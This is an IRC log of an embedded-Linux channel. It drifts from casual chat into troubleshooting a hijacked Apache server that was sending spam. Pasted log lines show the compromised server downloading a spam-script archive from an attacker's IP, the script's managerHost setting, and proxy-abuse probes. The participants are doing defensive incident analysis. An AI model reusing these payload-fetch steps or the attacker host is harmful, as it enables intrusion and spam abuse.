00:08.22 | *** part/#elinux Rocinante ([5+adKfX28@12-254-194-122.client.attbi.com) |
00:08.27 | *** join/#elinux TomW (tom@24.229.147.16) |
00:10.19 | sjhill | hi TomW |
00:10.37 | TomW | Good morning |
00:10.40 | sjhill | sorphin: wake up boy |
00:11.01 | sjhill | TomW: you old people don't keep track of time well do you? |
00:11.05 | sjhill | :) |
00:11.07 | TomW | I have been neck deep in 8051 code lately. :/ |
00:11.11 | sjhill | ah |
00:11.25 | sjhill | you have my condolences |
00:11.50 | TomW | I do cross development on GNU C, debug it with gdb, then shove it into the controller for final testing. |
00:13.28 | TomW | I have the dosemu loaded so I can run the old dos based C compiler / assembler. My make file system modifies the autoexec.bat of the dosemu, then invokes dosemu, dosemu build the stuff then exits. Pretty slick setup! |
00:14.39 | TomW | sjhill: I can use the linux command line utils to grep, cut, etc.. Also use the GNU make & perl to manage the whole process, and finally, use cvs to keep track of the changes. |
00:14.59 | TomW | sjhill: what's up? |
00:16.34 | sjhill | TomW: nothing, just trying to get things wrapped up before i leave for my new job this weekend...moving to pittsburgh |
00:17.58 | TomW | cool! You going to do some of the linux stuff I see advertised in the want ads? |
00:20.43 | CosmicPenguin | TomW: you see Linux stuff advertised in want ads? |
00:21.50 | sjhill | TomW: i'm going to work for TimeSys to hard real-time embedded linux....maybe real-time java eventually if they want me to |
00:22.34 | CosmicPenguin | real time Java? I understand those words, but do they go together? |
00:22.58 | Lethal | ew. rt java. ew. |
00:23.37 | Lethal | talk about having too much free time |
00:24.00 | TomW | CosmicPenguin: up at dice.com. There is some embedded stuff going on in Pittsburg, Pa. |
00:24.35 | TomW | sjhill: yeah, I've seen the ads on dice.com for that Timesys company. |
00:25.20 | TomW | sjhill: I wonder how you got a job there? Didn't they want a "linux guru", somebody like Allan Cox? |
00:25.23 | TomW | sjhill: heh |
00:26.25 | CosmicPenguin | TomW: sjhill probably falls in that category |
00:26.51 | TomW | ok, just couldn't resist saying that! :-D |
00:30.00 | sjhill | heh |
00:30.28 | sjhill | TomW: the interview process was a bit tough, but they hired Lethal which means they'll take about anyone |
00:30.35 | sjhill | heh |
00:30.41 | TomW | LOL! |
00:31.07 | TomW | Really desperate for talent, eh? Sounds like my kind of situation! |
00:31.34 | Lethal | sjhill, erm. don't make me kick your ass. |
00:32.35 | Lethal | sjhill, manas might not even be in on the monday you start, so you might get lucky ;P |
00:34.31 | sjhill | Lethal: why, would he inundate me with stuff? |
00:35.40 | Lethal | sjhill, doubt it. we already hired someone to attempt to make gdb not suck, so there's like 90% of the company engineering effort out the window :P |
00:36.36 | sjhill | heh |
00:39.57 | TimRiker | how many are they hiring? do you have to be local? |
00:40.24 | Lethal | still hiring selectively, and yes, unfortunately you have to be local :P |
00:40.44 | TimRiker | silicon valley, yes? /me does not care to move there. |
00:40.58 | Lethal | no, pittsburgh, pa. |
00:41.02 | Lethal | I liked silicon valley considerably more. |
00:41.20 | Tangent | Hooray.. I have debian via nfs running on my tuxscreen and am sshing in :)... |
00:41.26 | Tangent | Now time for some swapspace... |
00:41.37 | TimRiker | ah. that's different. I'd consider pittsburg. got relatives in NY and philly. |
00:41.50 | Lethal | ah |
00:42.02 | Lethal | well, at least the cost of living here is cheap :P |
00:42.27 | TimRiker | yeah, that's the main reason I avoid silicon valley positions. |
00:42.41 | TimRiker | cost of living is 214% what is is here. |
00:42.48 | Lethal | silicon valley positions are great if you can work remotely ;P |
00:43.39 | CosmicPenguin | TimRiker: can't get much cheaper than SLC, unless you live in poedunk texas |
00:44.06 | TimRiker | looks like pittsburg is 7% higher than Provo/Orem |
00:44.33 | Lethal | yeah, but whats there to do in slc? :P |
00:44.42 | CosmicPenguin | Lethal: you would be surprised |
00:44.44 | sorphin | ibot: cluebat sjhill |
00:44.45 | | ACTION pulls out a ClueBat (tm) and thwaps sjhill. |
00:44.47 | TimRiker | Lethal: well then they aren't silicon valley positions are they? ;-) |
00:45.28 | Lethal | not enough people hiring these days |
00:46.20 | TimRiker | outskirts like "Plum" ... (where's that?) are actually cheaper than here. wow. |
00:47.12 | Lethal | plum isn't far from here. most places are really just suburbs. |
00:47.12 | Lethal | I'm in monroeville. |
00:47.19 | Lethal | its pretty cheap here |
00:47.22 | TimRiker | well, pass on a resume if they are interested http://rikers.org/resume.htm I'm off to dinner. flying to dallas for an interview this weekend. |
00:48.00 | TimRiker | monroeville shows +1.5% from here. not bad. |
00:51.52 | TomW | Lethal: one of the reasons I moved to Pa 15 years ago, I could afford to live here! |
00:53.55 | Tangent | Has anyone got an nbd module for strongarm ? |
00:54.06 | Lethal | TomW, heh |
00:54.09 | Tangent | 2.4.18-rmk6-tux1 |
00:54.32 | TomW | Tangent: didn't 2.4.18 have some bugs in it? |
00:54.33 | Lethal | TomW, I moved here from san jose, so the housing costs were a nice surprise ;P |
00:54.43 | Tangent | TomW: No idea... I'm obsolete |
00:55.16 | Tangent | If I can make swap work, I'll build a new kernel for it |
00:55.32 | TomW | Lethal: WHEW! Yeah, I know about the housing costs around San Jose. I stayed in Santa Cruz about 30 years ago and San Jose was big-time expensive back then! |
00:56.19 | TomW | Tangent: they are telling the mainstream linux users to upgrade to 2.4.19 because of some problem. |
00:56.35 | Lethal | santa cruz is cool, I had some friends there, the commute just sucked :P |
00:57.10 | Tangent | TomW: 6 months ago I upgraded to 2.4.18.. and today I got around to booting it..... That's why I'm reluctant to upgrade the kernel today... |
00:57.23 | Tangent | It'll just be a whole new load of hassles |
00:57.51 | Lethal | wow, I hate our mail system. I get one piece of spam, and then I get an automated mail from IT telling me I have spam. |
00:57.52 | Lethal | wtf. |
00:58.13 | kergoth | spammed by IT. what else is new |
00:58.14 | Tangent | What a sweet system :_ |
00:58.41 | Tangent | I get two bounce messages delivered to me for every piece of spam that fails to get delivered to non-existant users |
00:58.54 | Lethal | kergoth, its not so bad in small volume. but I just got half a dozen of them. most irritating. |
00:59.11 | Lethal | not to mention, I don't need another piece of spam relaying the fact I have mail. |
00:59.41 | Lethal | they need to limit this behavior to outlook folk. |
00:59.53 | Lethal | they should be quarantined anyways. |
01:08.15 | Tangent | My mail goes through realtime blackhole list + amavis + sanitizer + spamassassin |
01:08.46 | Tangent | There's still about 2 a month that make it to the inbox tho' |
01:08.52 | Lethal | I usually just filter out marketing + *@gnu.org to /dev/null and it cuts out about 90% of my spam |
01:15.30 | Tangent | ibot tuxscreen kernel |
01:15.31 | | no idea, Tangent |
01:15.39 | Tangent | ibot tuxscreen patches |
01:15.40 | | Tangent: parse error: dunno what the heck you're talking about |
01:41.24 | Tangent | Is there not some convenient stash of pre-built kernels and modules for the tux? |
01:47.29 | TomW | Tangent: to go back in version or up in version? |
01:48.00 | Tangent | TomW: Either |
01:48.18 | Tangent | TomW: either NBD modules for 2.4.18, or whole new kernel + nbd modules |
01:50.18 | TomW | for the basic ARM stuff, goto ftp://ftp.arm.linux.org.uk/pub/armlinux/source/kernel-patches/v2.4 |
01:52.51 | TomW | Tangent: check out: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/tuxscreen/buildroot-tux/make/linux.mk |
01:53.12 | TomW | Tangent: Erik checked in the rmk-2.4.19 patches less than a day ago. |
02:08.25 | Tangent | TomW: I've got buildroot going already... It's just that it takes _ages_ |
02:08.48 | Tangent | Anyhow.. I'm off to bed... |
02:08.49 | Tangent | Night all |
02:09.57 | jacques_gone | hi |
02:10.12 | jacques | i was at surpluscomputers again on sunday |
02:10.18 | jacques | they have webpals again |
02:10.27 | jacques | $12.95 |
02:10.38 | jacques | $7.95 if you dont want the modem! |
02:16.21 | TomW | jacques: hello |
02:17.06 | TomW | jacques: really! Guess you'll have to go to a computer show and purchase some old ISA stuff, eh? |
02:17.55 | jacques | TomW: you mean to replace the modem? |
02:18.03 | jacques | does hte webpal have an isa slot? |
02:20.46 | TomW | jacques: yes, a limited one. Only has a single IRQ line for it. |
02:24.03 | TomW | jacques: a good site for the webpal is at: http://www.geocities.com/webpalstuff/ |
02:24.47 | TomW | jacques: he does have a complete set of schematics, but they are in Eagle CAD. You will have to download the freebie Eagle from: http://www.cadsoft.de |
02:25.14 | TomW | jacques: he did an excellent job of doing the schematics, really professional job! |
02:47.18 | jacques | cool |
02:50.55 | MonMotha | there are PDFs of the schematics up if you don't have eagle and are too lazy to install it (like me) |
03:05.40 | *** join/#elinux scanline (~micah@aden2-42-dhcp.resnet.Colorado.EDU) |
03:14.57 | sorphin | scanline: heh, on ebay, all episodes of mavgyver, heh |
03:15.06 | scanline | hehe |
03:15.36 | sorphin | scanline: the vcd ones are pricey as hell, someone has cheaper vhs in good shape (a few fulls) |
03:46.25 | CosmicPenguin | Damn turbotax site just went down |
03:50.22 | andersee | CosmicPenguin: speaking of taxes... did you get that 1099 form? |
04:01.38 | CosmicPenguin | andersee: yeah... :) |
04:01.48 | CosmicPenguin | andersee: owe the gomment some money, I guess |
04:08.10 | *** join/#elinux Rocinante ([4W6ugZwlz@12-254-194-122.client.attbi.com) |
04:08.31 | Rocinante | CosmicPenguin: I'll catch up with you in the morning...Things came up |
04:19.44 | *** part/#elinux Rocinante ([4W6ugZwlz@12-254-194-122.client.attbi.com) |
05:28.17 | *** join/#elinux ChanServ (ChanServ@services.) |
05:28.17 | *** mode/#eLinux [+o ChanServ] by calvino.freenode.net |
12:45.57 | *** join/#elinux mallum (~mallum@pc-80-193-218-21-hw.blueyonder.co.uk) |
14:42.02 | *** join/#elinux GPSFan (~kenm@65.114.238.130) |
14:52.20 | *** join/#elinux Rocinante ([MFzRVPw2O@12-254-194-122.client.attbi.com) |
15:09.20 | CosmicPenguin | Morning folks |
15:22.40 | *** join/#elinux prpplague (~JoeBob1@12.148.134.9) |
15:22.40 | *** mode/#eLinux [+o prpplague] by ChanServ |
15:23.48 | sorphin | CosmicPenguin: lo |
15:23.52 | sorphin | prpplague: morning dave |
15:23.57 | prpplague | sorphin: hey |
15:24.07 | prpplague | whats up today guys? |
15:24.13 | CosmicPenguin | seņor POS! |
15:24.37 | prpplague | si |
15:24.56 | sorphin | prpplague: when i said yesterday i was getting prpplague type gear on ebay, i meant POS stuff ;) (specifically still trying to get a mag stripe reader i don't have to try and run through the fscking game port or shiz) |
15:25.36 | sorphin | heh |
15:25.37 | sorphin | Comdex Operators File for Bankruptcy |
15:25.49 | sorphin | good thing i've never even been to it ;p |
15:26.33 | prpplague | sorphin: ahh |
15:27.07 | sorphin | oen thing i hate about ebay sometimes.. something's 4 DAYS out |
15:27.11 | sorphin | and someone bids :P |
15:27.23 | sorphin | like it's ending tomorrow or somehting ;p |
15:27.50 | CosmicPenguin | sorphin: newbies |
15:28.01 | sorphin | annoyances is more like |
15:28.29 | sorphin | CosmicPenguin: so since they made you stay, when can we expect pixil? ;) |
15:30.24 | CosmicPenguin | sorphin: check the address on my name - I am no longer an employee of Century Software |
15:30.58 | prpplague | CosmicPenguin: ? |
15:31.03 | prpplague | CosmicPenguin: you get axed? |
15:31.35 | CosmicPenguin | prpplague: yep |
15:34.08 | prpplague | CosmicPenguin: damm |
15:34.16 | prpplague | CosmicPenguin: overnight? |
15:39.00 | CosmicPenguin | prpplague: yesterday some time |
15:39.17 | prpplague | CosmicPenguin: man |
15:39.29 | prpplague | CosmicPenguin: so is it just greg now? |
15:39.38 | CosmicPenguin | prpplague: as far as engineers? |
15:39.49 | CosmicPenguin | prpplague: my old supervisor Jason is still there, they are the programmers |
15:40.11 | CosmicPenguin | prpplague: anyway, I was given a month of consulting to finish up Pixil |
15:40.31 | prpplague | CosmicPenguin: atleast thats something |
15:49.10 | sorphin | CosmicPenguin: layoff or fire ? |
15:49.37 | prpplague | sorphin: fired, he got caught with too much pr0n on the company server :) |
15:49.46 | sorphin | prpplague: sound about right ;) |
15:49.50 | sorphin | +s |
15:52.50 | CosmicPenguin | sorphin: so what you are saying is that I *shouldn't* have mooned the CEO? |
15:54.19 | sorphin | CosmicPenguin: right |
15:55.24 | prpplague | CosmicPenguin: did you beat yourself up like on fightclub? |
15:55.56 | CosmicPenguin | prpplague: no, but thats a good thought for next time... :) |
15:56.39 | *** join/#elinux sieve (~sieve@12.148.134.9) |
15:57.14 | sieve | morning |
15:57.19 | sorphin | speaking of people that need to be removed from employment, that shipping chick at abcsinc needs to be ;p |
15:57.22 | prpplague | sieve: you get that memo about your tps reports? |
15:58.01 | Rocinante | signal11: Thanks for setting up the forwarding |
15:58.03 | prpplague | sorphin: lol, which reminds me, i need to get down there and get you guys stuff shipped |
15:58.13 | signal11 | Rocinante: any time |
15:58.22 | CosmicPenguin | signal11: do me a huge favor? |
15:58.27 | signal11 | CosmicPenguin: sure |
15:58.36 | CosmicPenguin | go to cosmic and turn on the ssh server? |
15:59.19 | sorphin | CosmicPenguin: are you doing an sjhill? ;) |
15:59.25 | CosmicPenguin | sorphin: ?? |
15:59.41 | sorphin | l33ching from the company before you go ;) |
16:00.14 | CosmicPenguin | sorphin: well, I am still technically a consultant - and I spent about 2 weeks getting my FVWM settings right, and I really don't want to do that again |
16:00.27 | sorphin | hehe |
16:00.46 | sorphin | haven't used fvwm in years ;) |
16:03.05 | kergoth | hey |
16:03.19 | sorphin | lo digichris |
16:03.49 | prpplague | kergoth: the fun with netsilicon continues, had 3 voicemails this morning |
16:03.49 | kergoth | man, putting my name and digi in the same word is just _mean_ :) |
16:04.02 | kergoth | prpplague: damn, insistant bastards arent they |
16:04.09 | prpplague | kergoth: no kidding |
16:04.33 | prpplague | kergoth: "if you come to the trainning session you could win a free digi-connect!" |
16:04.34 | sorphin | kergoth: hey, you're the one htat works for em ;p |
16:04.58 | kergoth | prpplague: oh wow! you better sign up for that! :P |
16:06.02 | *** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com) |
16:06.17 | Morn | bloody hell |
16:06.51 | sorphin | Morn: ? |
16:07.28 | prpplague | Morn: not destroying cell phones this morning are you? |
16:07.34 | Morn | some joker keeps trying to use my web server to launch a spam attack |
16:07.43 | sorphin | Morn: been there, see that |
16:07.44 | Morn | prpplague: no, I lost my cell phone in a NYC cab yesterday |
16:07.50 | sorphin | Morn: you should see my web logs :P |
16:07.53 | sorphin | Morn: doh |
16:07.57 | Morn | sorphin: do you know how it works? |
16:08.05 | Morn | I can't find the hole they are using |
16:08.13 | Morn | they are uploading a perl script |
16:08.22 | SmithMatt | paste in some of your logs |
16:08.23 | sorphin | formmail.pl ? |
16:08.29 | sorphin | or such |
16:08.34 | Morn | I see them TRYING to use that, but this is different |
16:08.35 | sorphin | that's an old one |
16:08.50 | sorphin | they're not trying to upload it |
16:08.52 | sorphin | they're trying to USE it |
16:08.59 | Morn | flood alert |
16:09.04 | Morn | HTTP request sent, awaiting response... 200 OK |
16:09.05 | Morn | Length: 10,170 [application/x-tar] |
16:09.05 | Morn | <PROTECTED> |
16:09.05 | Morn | 02:27:03 (18.09 KB/s) - `/tmp/af56j/archive.tgz' saved [10170/10170] |
16:09.05 | Morn | tar: guestbook.cgi: time stamp 2003-02-04 02:28:27 is 84 s in the future |
16:09.05 | Morn | gzip: stdin: unexpected end of file |
16:09.07 | Morn | tar: Child returned status 1 |
16:09.09 | Morn | tar: Error exit delayed from previous errors |
16:09.11 | Morn | tar: guestbook.cgi: time stamp 2003-02-04 02:28:27 is 84 s in the future |
16:09.13 | Morn | sh: line 1: /usr/bin/telnet: Permission denied |
16:09.18 | Morn | that's in the /var/log/httpd/error_log |
16:09.20 | sorphin | ummm |
16:09.30 | sorphin | cute |
16:09.38 | Morn | And I see that they are trying to use gcc and and stuff |
16:09.46 | Morn | but I locked down the compilers and the network tools |
16:09.53 | sorphin | you have a hole in your apache |
16:10.00 | sorphin | or that guestbook cgi |
16:10.05 | Morn | no shit |
16:10.08 | SmithMatt | totally.. they're already running stuff... they just haven't run the bomb yet. |
16:10.10 | Morn | no, they are uploading guestbook.cgi |
16:10.17 | sorphin | uhh |
16:10.35 | Morn | guestbook.cgi sets off a major spam attack |
16:10.39 | sorphin | don't allow POST :P |
16:10.47 | Morn | starts like 70 processes spamming |
16:10.54 | SmithMatt | a good place to start would be to kill apache... |
16:11.00 | Morn | I can't kill apache |
16:11.05 | sorphin | upgrade apache, disable POST |
16:11.11 | Morn | I run a business that requires apache |
16:11.15 | Morn | and I can't just turn off POST |
16:11.20 | sorphin | uhh |
16:11.20 | Morn | all the web forms would stop working |
16:11.23 | SmithMatt | you're running a spam business right now... pick one. |
16:11.27 | sorphin | then *restrict* it :P |
16:11.28 | Morn | my clients would shit |
16:11.35 | SmithMatt | what apache version? |
16:11.35 | Morn | I actually stopped the spam thing |
16:11.58 | Morn | it creates a dir in tmp named a56j or something I set the permissions unwritable for that dir |
16:12.05 | Morn | so it can't untar the spam attack |
16:12.21 | sorphin | heh |
16:12.22 | Morn | apache-1.3.26-6.1mdk |
16:12.41 | sorphin | this is why i make my webserver unuseable to outsiders ;) |
16:12.44 | Morn | I have the latest security updates from Mandrake |
16:12.54 | Morn | sorphin: I have paying web clients |
16:13.00 | sorphin | Morn: that's not what i mean |
16:13.00 | sorphin | :P |
16:13.02 | Morn | the whole point is so outside users can use it |
16:13.10 | sorphin | you misread what i say :P |
16:13.33 | Morn | I'm trying to figure out how they are uploading the file |
16:13.38 | Morn | and as of yet I don't see it |
16:13.41 | sorphin | uhh |
16:13.46 | sorphin | post prolly :P |
16:13.47 | Morn | it doesn't appear to be a bad cgi script |
16:14.05 | sorphin | it'd be in access_log prolly |
16:14.06 | Morn | I don't see any POST's in the logs that would indicate this |
16:14.14 | Morn | I did a grep on all posts |
16:14.17 | sorphin | well, a GET can't push a file |
16:14.24 | sorphin | to the server |
16:15.07 | Morn | www.magenet.com-access_log:ns2a.nlenet.net - - [03/Feb/2003:07:44:43 -0500] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 317 |
16:15.11 | Morn | www.magenet.com-access_log:ns2a.nlenet.net - - [03/Feb/2003:07:44:43 -0500] "POST /cgi-bin/formmail.cgi HTTP/1.1" 404 318 |
16:15.11 | Morn | there are tons of those |
16:15.15 | sorphin | yup |
16:15.24 | Morn | but they are all 404 |
16:15.28 | sorphin | that's the old one i was talking about |
16:15.36 | Morn | I don't see any sucessful POST's that would result in this |
16:15.43 | sorphin | timestamp match against the error log :P |
16:15.55 | Morn | I tried that |
16:16.04 | sorphin | send me your logs, julie |
16:16.12 | Morn | the FormMail requests happen very CLOSE to the other |
16:16.29 | Morn | I saw |
16:16.38 | Morn | I can't do that easily |
16:16.51 | Morn | My logs are HUGE and there are many of them |
16:16.56 | sorphin | umm |
16:17.05 | sorphin | i only need the logs that have that time frame in them ;p |
16:17.06 | Morn | I have 60 different web hosts running |
16:17.37 | sorphin | that's nice.. i only need the applicable access/error logs from the "host" that was attacked |
16:17.50 | Morn | what address? |
16:18.05 | Morn | email address that is |
16:18.17 | sorphin | that one |
17:10.49 | sorphin | Morn: heh, ironic that yesterday there was a story on /. about cgi-shell, and you have a cgi exploit goin on ;p |
17:16.49 | Morn | Is it possible to use a PUT to do this? |
17:17.11 | sorphin | might be, forgot if there is a put |
17:17.37 | Morn | I'm not sure it is CGI related |
17:17.39 | Morn | right now I just have no idea what the deal is |
17:18.11 | sorphin | heh |
17:18.12 | sorphin | POST http://127.0.0.1:25/ |
17:18.15 | sorphin | you get some fun ones |
17:18.17 | sorphin | i'll say htat ;p |
17:18.29 | Morn | yeah, all kinds of weird stuff in there |
17:18.35 | sorphin | CONNECT http://127.0.0.1:25/ |
17:18.42 | sorphin | i see people try and use my webserver as a proxy |
17:20.30 | sorphin | Morn: your access log doesn't go back far enough |
17:20.39 | sorphin | this is from the 3rd, hte exploit was on the 1st |
17:20.55 | Morn | the exploit happened again on the 3rd |
17:21.00 | Morn | around 6am |
17:21.08 | Morn | that's why I put the 3rd in there |
17:21.16 | sorphin | sheesh |
17:21.23 | sorphin | it happened a LOT |
17:21.26 | Morn | no shit |
17:21.32 | Morn | that's why I'm worried |
17:21.46 | Morn | I can't see how it's happening |
17:21.54 | Morn | this is like driving blind |
17:22.10 | sorphin | lemme pull the archive thye're using |
17:22.21 | Morn | I tried to find it on google |
17:22.25 | Morn | I didn't have any luck |
17:22.39 | Morn | I was trying to find something on how to do this |
17:22.44 | Morn | so I could plug it |
17:23.04 | sorphin | haha |
17:23.10 | sorphin | you're being attacked from russia :P |
17:23.18 | Morn | oh? |
17:23.28 | sorphin | yeah |
17:23.33 | sorphin | whois on this IP :P |
17:23.34 | sorphin | 217.106.122.58 |
17:23.43 | sorphin | descr: Stack Ltd. |
17:23.43 | sorphin | descr: Russia, Siberia, Tomsk |
17:24.32 | sorphin | eww.. use use suexec ? |
17:24.37 | sorphin | you even |
17:24.47 | Morn | it's part of the default install |
17:24.51 | Morn | I had plans to use it |
17:24.57 | Morn | but I never did that project |
17:24.59 | sorphin | until you intend to do so |
17:25.02 | sorphin | i'd turn it off |
17:25.03 | sorphin | :P |
17:28.50 | *** join/#elinux TimRiker (timr@rikers.org) |
17:28.51 | *** mode/#eLinux [+o TimRiker] by ChanServ |
17:29.01 | sorphin | TimRiker: hola |
17:29.35 | TimRiker | hola. como estas? |
17:29.40 | sorphin | eh.. |
17:29.59 | sorphin | TimRiker: trying to help Morn find how someone's getting this exploit through her webserver |
17:30.17 | sorphin | the logs show no PUT/POST |
17:30.22 | TimRiker | ooh.. sploits |
17:30.25 | sorphin | yup |
17:31.21 | sorphin | TimRiker: this look familiar? (incoming flood) |
17:31.23 | sorphin | which: no fetch in (/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin) |
17:31.24 | sorphin | guestbook.cgi: no process killed |
17:31.24 | sorphin | perl: no process killed |
17:31.24 | sorphin | sh: line 1: fetch: command not found |
17:31.24 | sorphin | --05:15:48-- http://217.106.122.58/archive.tgz |
17:31.26 | sorphin | <PROTECTED> |
17:31.28 | sorphin | Connecting to 217.106.122.58:80... connected. |
17:31.30 | sorphin | HTTP request sent, awaiting response... 200 OK |
17:31.32 | sorphin | Length: 92,695 [application/x-tar] |
17:31.34 | sorphin | <PROTECTED> |
17:31.36 | sorphin | <PROTECTED> |
17:31.38 | sorphin | 05:15:49 (72.19 KB/s) - `/tmp/af56j/archive.tgz' saved [92695/92695] |
17:31.40 | sorphin | tar: guestbook.cgi: time stamp 2003-02-01 05:18:13 is 144 s in the future |
17:31.42 | sorphin | gzip: stdin: unexpected end of file |
17:31.44 | sorphin | tar: Child returned status 1 |
17:31.46 | sorphin | tar: Error exit delayed from previous errors |
17:31.48 | sorphin | tar: guestbook.cgi: time stamp 2003-02-01 05:18:13 is 144 s in the future |
17:31.50 | sorphin | ls: /tmp/af56j/guestbook.cgi: No such file or directory |
17:32.00 | sorphin | the technique that is |
17:32.36 | sorphin | it appears to be a perl script w/ some perl modules, cna't figure how they're stuffing it through.. i got sploited via DNS ages ago, but that was fixed w/ an upgrade |
17:33.09 | sorphin | ooh |
17:33.18 | sorphin | someone was definately bored (as i look at this script) |
17:33.23 | Morn | as a temp fix I made the permissions on /tmp/af56j 000 |
17:34.16 | Morn | bored? |
17:34.29 | sorphin | yeah, to go through the trouble of writing this crap |
17:34.45 | Morn | the weird thing is it seems to clean up after itself |
17:34.53 | Morn | I mean the original archive.tgz gets erased |
17:34.58 | Morn | whatever it was trying to compile |
17:35.11 | Morn | and I killed the webserver before backing up that dir |
17:35.12 | sorphin | it's all perl |
17:35.22 | sorphin | the guestbook bit |
17:35.22 | Morn | but look, there are attempts to use gcc |
17:35.28 | Morn | which failed |
17:35.46 | Morn | because only the people with permission can run the compilers |
17:35.50 | sorphin | not in the archive.tgz there aren't |
17:35.55 | Morn | and apache isn't in that list |
17:35.59 | sorphin | maybe it grabs something else |
17:36.10 | sorphin | but this archive is just a listener |
17:36.10 | Morn | did you find archive.tgz? |
17:36.20 | sorphin | yes |
17:36.27 | sorphin | it's in your logs julie |
17:36.28 | Morn | can you send it to me, or give me a link |
17:36.40 | sorphin | --07:33:57-- http://217.106.122.58/archive.tgz |
17:36.44 | sorphin | right there |
17:36.49 | Morn | doh! |
17:36.52 | sorphin | ;) |
17:36.54 | Morn | I'm an idiot |
17:36.58 | sorphin | :) |
17:38.43 | Morn | it couldn't use telnet either |
17:38.49 | sorphin | hehe |
17:38.49 | Morn | you have to be in the ntools group for that |
17:38.57 | sorphin | rotfl |
17:39.05 | sorphin | </anal> |
17:39.22 | Morn | ? |
17:39.26 | sorphin | you |
17:39.34 | sorphin | everything in it's own lil groups |
17:39.46 | Morn | This could have been worse if I hadn't have done that |
17:39.51 | sorphin | true |
17:39.57 | sorphin | i never get to that point tho |
17:40.21 | sorphin | the webserver does nothing but webserve |
17:40.58 | sorphin | but everything is controlled |
17:41.02 | Morn | my server is multifunctional |
17:41.12 | Morn | since it is a shell server too |
17:41.18 | sorphin | heh |
17:41.22 | sorphin | diff box for that :P |
17:41.25 | Morn | which is part of the reason for the multiple group settings |
17:41.34 | Morn | 500 users can get out of control |
17:41.40 | sorphin | uhhhh |
17:41.45 | sorphin | you're nuts ;) |
17:42.01 | Morn | my doctor would agree (giggle) |
17:42.08 | sorphin | i'm sure :P |
17:42.24 | Morn | he seems happy with the dvd I converted for him though |
17:42.37 | Morn | but he really didn't understand a word I babbled about how I did it |
17:42.41 | sorphin | hehe |
17:42.52 | sorphin | still not sure about my dvd2one probs |
17:43.07 | Morn | his was the PAL->NTSC conversion |
17:43.12 | Morn | I think it came out very nice |
17:43.20 | sorphin | how'd you do it ? |
17:43.57 | Morn | the actually conversion I used tmpgenc+ for |
17:44.10 | Morn | but I did a lot of work to get the subtitles right |
17:44.15 | Morn | and keep the audio in sync |
17:44.24 | sorphin | nod |
17:44.35 | Morn | it takes tmpgenc a LONG time to do a PAL->NTSC conversion |
17:44.40 | sorphin | julie |
17:44.44 | Morn | 6.5 hours on my box for 1.5 hours of video |
17:44.52 | sorphin | it takes tmpgenc a long time to do ANYTHING :P |
17:46.14 | Morn | If I block that IP it'll help right? |
17:46.16 | sorphin | man this "sploit" as tim calls them, is humorous |
17:46.29 | Morn | that way the script can't contact the 'managerHost' and get info |
17:46.31 | sorphin | it'll prevent them from pulling that file, yes |
17:46.45 | sorphin | and if the whole thing is coming from that IP |
17:46.52 | sorphin | you'll block that too |
17:46.56 | Morn | well, it contacts that ip for more than just the file |
17:47.18 | sorphin | taht's the stuff i want to see ;) |
17:47.19 | Morn | my $managerHost="217.106.122.58"; |
17:47.23 | sorphin | i know |
17:47.31 | sorphin | i wish i had a honeypot |
17:47.38 | Morn | ? |
17:47.55 | sorphin | a nice isolated, doesn't matter what happens to it box |
17:48.01 | sorphin | so i can watch this thing at work |
17:48.51 | TimRiker | any idea on user/group ownership for the sploit stuff? |
17:48.53 | TimRiker | does it look like a cgi script issue? |
17:48.57 | TimRiker | you have looked for lame things like perl binaries in the cgi-bin directory etc I presume? |
17:49.35 | sorphin | TimRiker: here's what's in the archive |
17:49.36 | Morn | I don't see any log entries showing how it uploaded the file |
17:49.36 | sorphin | -rwxrwxr-x zas/staff 5704 2003-02-04 01:28:27 guestbook.cgi |
17:49.36 | sorphin | drwxrwxr-x zas/staff 0 2003-02-02 04:03:22 lib/ |
17:49.36 | sorphin | drwxrwxr-x zas/staff 0 2003-02-01 05:29:07 lib/Net/ |
17:49.36 | sorphin | -r--rw-r-- zas/staff 8762 2003-02-03 04:11:16 lib/Net/SMTP.pm |
17:49.36 | sorphin | -r--rw-r-- zas/staff 9703 2003-02-03 04:11:35 lib/Net/Cmd.pm |
17:49.38 | sorphin | -r--rw-r-- zas/staff 3387 2003-02-03 04:11:26 lib/Net/Config.pm |
17:49.40 | sorphin | -rw-r--r-- zas/zas 3771 2003-02-03 04:10:56 lib/ForkManager.pm |
17:49.48 | Morn | just a error message that it was uploaded |
17:49.49 | sorphin | we can't figure how it's sneaking the file in tho |
17:50.12 | Morn | there's nothing relavent in the logs other than the formmail searches around the times it happens |
17:50.33 | Morn | and that guestbook.cgi forks off a lot of processes |
17:50.39 | Morn | I came home to a load of 30 |
17:50.45 | TimRiker | who is the zas user? |
17:50.47 | Morn | and 70 processes spamming everyone |
17:51.06 | sorphin | whoever made that archive on the box it gets it from i guess |
17:51.28 | TimRiker | oh, is that a tar directory ? or an ls? |
17:51.29 | sorphin | TimRiker: http://217.106.122.58/archive.tgz |
17:51.37 | sorphin | a tar |
17:51.40 | sorphin | that's where it pulls it from |
17:51.57 | sorphin | something is causing her webserver to fetch that file from that IP |
17:52.16 | Morn | I guess the best thing is to iptables block that ip |
17:52.18 | sorphin | Morn: i suspect suExec tho |
17:52.34 | Morn | hmmm |
17:52.36 | sorphin | cuz i always see [Mon Feb 3 21:20:55 2003] [notice] suEXEC mechanism enabled (wrapper: /usr/sbi |
17:52.39 | sorphin | right before hte exploit |
17:52.46 | TimRiker | what cgi scripts are installed on the webserver? |
17:52.54 | sorphin | TimRiker: she has suEXEC running |
17:52.59 | sorphin | TimRiker: which i don't trust |
17:53.00 | Morn | TimRiker: A lot of stuff, I have commercial clients |
17:53.11 | Morn | let me disable suExec |
17:53.18 | TimRiker | and the clients upload thier own cgi scripts? |
17:53.38 | TimRiker | I suspect a poorly written cgi script someplace. |
17:53.51 | TimRiker | many of those are easy to exploit. |
17:54.19 | Morn | I have a central cgi-bin for most stuff |
17:54.25 | Morn | but I gave a few clients their own |
17:54.34 | Morn | but with all the stuff it's hard to keep up with it |
17:55.58 | TimRiker | giving folks cgi access is effectively giving them shell access. and if they write bad scripts, then you might be giving the world shell access. |
17:56.20 | Morn | all the users already have shell access |
17:56.24 | Morn | 500 shell users |
17:56.40 | Morn | but only 2 have their own cgi-bin |
17:56.47 | Morn | the rest have to send scripts to me first |
17:57.02 | Morn | I try to encourage the use of php instead of perl scripts |
17:57.17 | Morn | You know I don't see where to turn off suexec |
